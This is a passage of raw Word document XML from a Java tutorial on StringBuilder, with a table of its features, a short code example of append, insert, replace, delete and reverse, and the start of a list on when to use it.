          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="790BC832">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDF973" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Key Features of StringBuild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21"/>
        <w:gridCol w:w="4493"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="24ED0FF5" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03577D95" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00945608">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E797793" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00945608">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="5F15D78E" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3589DD68" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Mutable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04FFA97D" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can modify content without creating new objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="28D810F9" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63FB56CC" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C3DC5BF" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Faster</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> than StringBuffer (no synchronization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="3904F0FC" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="040FD91B" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Thread-safety</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F08A092" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Not synchronized</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, hence not thread-safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B0688" w:rsidRPr="00CE4B95" w14:paraId="5B358997" w14:textId="77777777" w:rsidTr="004B0688">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D9DB56A" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Dynamic length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76454A05" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Resizable — automatically grows as needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69348197" w14:textId="062EF4B9" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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Common Methods in StringBuilder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DBF7A0" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sb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Builder</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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB769B9" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FCBAD" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Append new text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54159439" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ppen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 Rocks"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE42998" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C92B8" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Insert text at a specified index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29358944" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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ser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4</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Programming"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFC941" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75386407" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Replace text in the specified range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F626133" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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plac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4</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Python"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37905B" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA9E10F" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Delete text from a specified range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322BA270" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sb</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delet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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F03800C" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545432A3" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Reverse the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276EBB" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s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verse</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFDBC5" w14:textId="77777777" w:rsidR="005636F5" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891AA96" w14:textId="20F23605" w:rsidR="005636F5" w:rsidRPr="00CE4B9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 Python Rocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149634D" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="122"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">StringBuilder is ideal for frequent modifications, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concatenation</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insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reversals</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488B499" w14:textId="070F12B8" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688" w:rsidP="00D536E7">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When to use StringBuilder?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85146B" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StringBuilder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D279D" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mutable string</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595643D" w14:textId="77777777" w:rsidR="004B0688" w:rsidRPr="00CE4B95" w:rsidRDefault="004B0688">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="123"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
